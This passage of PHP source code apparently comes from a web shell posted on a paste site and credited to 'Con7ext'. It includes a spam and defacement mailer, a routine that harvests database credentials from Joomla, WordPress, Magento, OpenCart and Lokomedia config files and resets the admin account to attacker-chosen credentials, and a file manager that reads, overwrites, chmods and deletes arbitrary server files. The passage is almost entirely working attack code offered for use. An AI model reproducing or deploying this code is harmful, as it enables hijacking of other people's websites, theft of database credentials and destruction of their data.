  3703.   if(@mail($to,$subject,$content,"FROM:$from")) {
  3704.     $out = "Mail sent to $to";
  3705.   } else {
  3706.     $out = "Failed !!";
  3707.   }
  3708. }
  3709.   echo "<h1>Mailer</h1>
  3710. <form method='post'>
  3711. <textarea name='content' value='Patch your security !' placeholder='Patch your security !'></textarea><br>
  3712. Subject :
  3713. <input type='text' name='subject' value='Your Website'><br>
  3714. To : <input type='text' name='to' value='admin@web.com'><br>From : <input type='text' name='from' value='con7ext@ini.email'><br><input type='submit' name='send' value='Send'><br><br>";
  3715. echo $out;
  3716. }elseif($_GET['con7ext'] == 'edituser') {
  3717.     if($_POST['hajar']) {
  3718.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  3719.             echo "username atau password harus lebih dari 6 karakter";
  3720.         } else {
  3721.             $user_baru = $_POST['user_baru'];
  3722.             $pass_baru = md5($_POST['pass_baru']);
  3723.             $conf = $_POST['config_dir'];
  3724.             $scan_conf = scandir($conf);
  3725.             foreach($scan_conf as $file_conf) {
  3726.                 if(!is_file("$conf/$file_conf")) continue;
  3727.                 $config = file_get_contents("$conf/$file_conf");
  3728.                 if(preg_match("/JConfig|joomla/",$config)) {
  3729.                     $dbhost = ambilkata($config,"host = '","'");
  3730.                     $dbuser = ambilkata($config,"user = '","'");
  3731.                     $dbpass = ambilkata($config,"password = '","'");
  3732.                     $dbname = ambilkata($config,"db = '","'");
  3733.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  3734.                     $prefix = $dbprefix."users";
  3735.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3736.                     $db = mysql_select_db($dbname);
  3737.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3738.                     $result = mysql_fetch_array($q);
  3739.                     $id = $result['id'];
  3740.                     $site = ambilkata($config,"sitename = '","'");
  3741.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  3742.                     echo "Config => ".$file_conf."<br>";
  3743.                     echo "CMS => Joomla<br>";
  3744.                     if($site == '') {
  3745.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3746.                     } else {
  3747.                         echo "Sitename => $site<br>";
  3748.                     }
  3749.                     if(!$update OR !$conn OR !$db) {
  3750.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3751.                     } else {
  3752.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3753.                     }
  3754.                     mysql_close($conn);
  3755.                 } elseif(preg_match("/WordPress/",$config)) {
  3756.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  3757.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  3758.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3759.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  3760.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3761.                     $prefix = $dbprefix."users";
  3762.                     $option = $dbprefix."options";
  3763.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3764.                     $db = mysql_select_db($dbname);
  3765.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3766.                     $result = mysql_fetch_array($q);
  3767.                     $id = $result[ID];
  3768.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3769.                     $result2 = mysql_fetch_array($q2);
  3770.                     $target = $result2[option_value];
  3771.                     if($target == '') {
  3772.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3773.                     } else {
  3774.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  3775.                     }
  3776.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  3777.                     echo "Config => ".$file_conf."<br>";
  3778.                     echo "CMS => Wordpress<br>";
  3779.                     echo $url_target;
  3780.                     if(!$update OR !$conn OR !$db) {
  3781.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3782.                     } else {
  3783.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3784.                     }
  3785.                     mysql_close($conn);
  3786.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  3787.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  3788.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  3789.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  3790.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  3791.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  3792.                     $prefix = $dbprefix."admin_user";
  3793.                     $option = $dbprefix."core_config_data";
  3794.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3795.                     $db = mysql_select_db($dbname);
  3796.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3797.                     $result = mysql_fetch_array($q);
  3798.                     $id = $result[user_id];
  3799.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  3800.                     $result2 = mysql_fetch_array($q2);
  3801.                     $target = $result2[value];
  3802.                     if($target == '') {
  3803.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3804.                     } else {
  3805.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  3806.                     }
  3807.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3808.                     echo "Config => ".$file_conf."<br>";
  3809.                     echo "CMS => Magento<br>";
  3810.                     echo $url_target;
  3811.                     if(!$update OR !$conn OR !$db) {
  3812.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3813.                     } else {
  3814.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3815.                     }
  3816.                     mysql_close($conn);
  3817.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  3818.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  3819.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  3820.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  3821.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  3822.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  3823.                     $prefix = $dbprefix."user";
  3824.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3825.                     $db = mysql_select_db($dbname);
  3826.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3827.                     $result = mysql_fetch_array($q);
  3828.                     $id = $result[user_id];
  3829.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  3830.                     if($target == '') {
  3831.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3832.                     } else {
  3833.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  3834.                     }
  3835.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3836.                     echo "Config => ".$file_conf."<br>";
  3837.                     echo "CMS => OpenCart<br>";
  3838.                     echo $url_target;
  3839.                     if(!$update OR !$conn OR !$db) {
  3840.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3841.                     } else {
  3842.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3843.                     }
  3844.                     mysql_close($conn);
  3845.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  3846.                     $dbhost = ambilkata($config,'server = "','"');
  3847.                     $dbuser = ambilkata($config,'username = "','"');
  3848.                     $dbpass = ambilkata($config,'password = "','"');
  3849.                     $dbname = ambilkata($config,'database = "','"');
  3850.                     $prefix = "users";
  3851.                     $option = "identitas";
  3852.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3853.                     $db = mysql_select_db($dbname);
  3854.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  3855.                     $result = mysql_fetch_array($q);
  3856.                     $target = $result[alamat_website];
  3857.                     if($target == '') {
  3858.                         $target2 = $result[url];
  3859.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3860.                         if($target2 == '') {
  3861.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3862.                         } else {
  3863.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  3864.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  3865.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  3866.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  3867.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  3868.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  3869.                             } else {
  3870.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3871.                             }
  3872.                         }
  3873.                     } else {
  3874.                         $cek_login = file_get_contents("$target/adminweb/");
  3875.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  3876.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  3877.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  3878.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  3879.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  3880.                         } else {
  3881.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3882.                         }
  3883.                     }
  3884.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  3885.                     echo "Config => ".$file_conf."<br>";
  3886.                     echo "CMS => Lokomedia<br>";
  3887.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  3888.                         echo $url_target2;
  3889.                     } else {
  3890.                         echo $url_target;
  3891.                     }
  3892.                     if(!$update OR !$conn OR !$db) {
  3893.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3894.                     } else {
  3895.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3896.                     }
  3897.                     mysql_close($conn);
  3898.                 }
  3899.             }
  3900.         }
  3901.     } else {
  3902.         echo "<center>
  3903.         <h1>Auto Edit User Config</h1>
  3904.         <form method='post'>
  3905.         DIR Config: <br>
  3906.         <input type='text' size='50' name='config_dir' value='$path'><br><br>
  3907.         Set User & Pass: <br>
  3908.         <input type='text' name='user_baru' value='con7ext' placeholder='user_baru'><br>
  3909.         <input type='text' name='pass_baru' value='con7ext' placeholder='pass_baru'><br>
  3910.         <input type='submit' name='hajar' value='Edit' style='width: 215px;'>
  3911.         </form>";
  3912.     }
  3913. }elseif(isset($_GET['filesrc'])){
  3914. echo "<tr><td>Current File : ";
  3915. echo $_GET['filesrc'];
  3916. echo '</tr></td></table><br/>';
  3917. echo('<textarea cols="80" rows="20" readonly>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  3918. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  3919. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  3920. if($_POST['opt'] == 'chmod'){
  3921. if(isset($_POST['perm'])){
  3922. if(chmod($_POST['path'],$_POST['perm'])){
  3923. echo '<font color="green">Success !</font><br/>';
  3924. }else{
  3925. echo '<font color="red">Denied !</font><br />';
  3926. }
  3927. }
  3928. echo '<form method="POST">
  3929. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  3930. <input type="hidden" name="path" value="'.$_POST['path'].'">
  3931. <input type="hidden" name="opt" value="chmod">
  3932. <input type="submit" value="Go" />
  3933. </form>';
  3934. }
  3935. elseif($_POST['opt'] == 'rename'){
  3936. if(isset($_POST['newname'])){
  3937. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  3938. echo '<font color="green">Success !</font><br/>';
  3939. }else{
  3940. echo '<font color="red">Denied !</font><br />';
  3941. }
  3942. $_POST['name'] = $_POST['newname'];
  3943. }
  3944. echo '<form method="POST">
  3945. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  3946. <input type="hidden" name="path" value="'.$_POST['path'].'">
  3947. <input type="hidden" name="opt" value="rename">
  3948. <input type="submit" value="Go" />
  3949. </form>';
  3950. }elseif($_POST['opt'] == 'edit'){
  3951. if(isset($_POST['src'])){
  3952. $fp = fopen($_POST['path'],'w');
  3953. if(fwrite($fp,$_POST['src'])){
  3954. echo '<font color="green">Success !</font><br/>';
  3955. }else{
  3956. echo '<font color="red">Denied !</font><br/>';
  3957. }
  3958. fclose($fp);
  3959. }
  3960. echo '<form method="POST">
  3961. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  3962. <input type="hidden" name="path" value="'.$_POST['path'].'">
  3963. <input type="hidden" name="opt" value="edit">
  3964. <input type="submit" value="Save" />
  3965. </form>';
  3966. }
  3967. echo '</center>';
  3968. }else{
  3969. echo '</table><br/><center>';
  3970. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  3971. if($_POST['type'] == 'dir'){
  3972. if(rmdir($_POST['path'])){
  3973. echo '<font color="green">Success !</font><br/>';
  3974. }else{
  3975. echo '<font color="red">Denied !                                                                                                             </font><br/>';
  3976. }
  3977. }elseif($_POST['type'] == 'file'){
  3978. if(unlink($_POST['path'])){
  3979. echo '<font color="green">Success</font><br/>';
  3980. }else{
  3981. echo '<font color="red">Denied</font><br/>';
  3982. }
  3983. }
  3984. }
  3985. echo '</center>';
  3986. $scandir = scandir($path);
  3987. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  3988. <tr class="first">
  3989. <td><center>Name</center></td>
  3990. <td><center>Size</center></td>
  3991. <td><center>Permission</center></td>
  3992. <td><center>Action</center></td>
  3993. </tr>';
  3994.  
  3995. foreach($scandir as $dir){
  3996. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  3997. echo '<tr>
  3998. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  3999. <td><center>--</center></td>
  4000. <td><center>';
  4001. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  4002. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  4003. echo perms($path.'/'.$dir);
  4004. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  4005.  
  4006. echo '</center></td>
  4007. <td><center><form method="POST" action="?option&path='.$path.'">
  4008. <select name="opt">
  4009. <option value="">Select</option>
  4010. <option value="delete">Delete</option>
  4011. <option value="chmod">Chmod</option>
  4012. <option value="rename">Rename</option>
  4013. </select>
  4014. <input type="hidden" name="type" value="dir">
  4015. <input type="hidden" name="name" value="'.$dir.'">
  4016. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  4017. <input type="submit" value=">">
  4018. </form></center></td>
  4019. </tr>';
  4020. }
  4021. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  4022. foreach($scandir as $file){
  4023. if(!is_file($path.'/'.$file)) continue;
  4024. $size = filesize($path.'/'.$file)/1024;
  4025. $size = round($size,3);
  4026. if($size >= 1024){
  4027. $size = round($size/1024,2).' MB';
  4028. }else{
  4029. $size = $size.' KB';
  4030. }
  4031.  
  4032. echo '<tr>
  4033. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  4034. <td><center>'.$size.'</center></td>
  4035. <td><center>';
  4036. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  4037. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  4038. echo perms($path.'/'.$file);
  4039. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  4040. echo '</center></td>
  4041. <td><center><form method="POST" action="?option&path='.$path.'">
  4042. <select name="opt">
  4043. <option value="">Select</option>
  4044. <option value="delete">Delete</option>
  4045. <option value="chmod">Chmod</option>
  4046. <option value="rename">Rename</option>
  4047. <option value="edit">Edit</option>
  4048. </select>
  4049. <input type="hidden" name="type" value="file">
  4050. <input type="hidden" name="name" value="'.$file.'">
  4051. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  4052. <input type="submit" value=">">
  4053. </form></center></td>
  4054. </tr>';
  4055. }
  4056. echo '</table>
  4057. </div>';
  4058. }
  4059. echo '<center><br/>Copyright &copy '.date("Y").' <a href="https://www.facebook.com/rinto2234" target="_blank">Con7ext</a> - <a href="https://www.facebook.com/xaisyndicate" target="_blank">'.$_COPY.'</a></center>
  4060. </body>
  4061. </html>';
  4062. ?>
Add Comment
Please, Sign In to add comment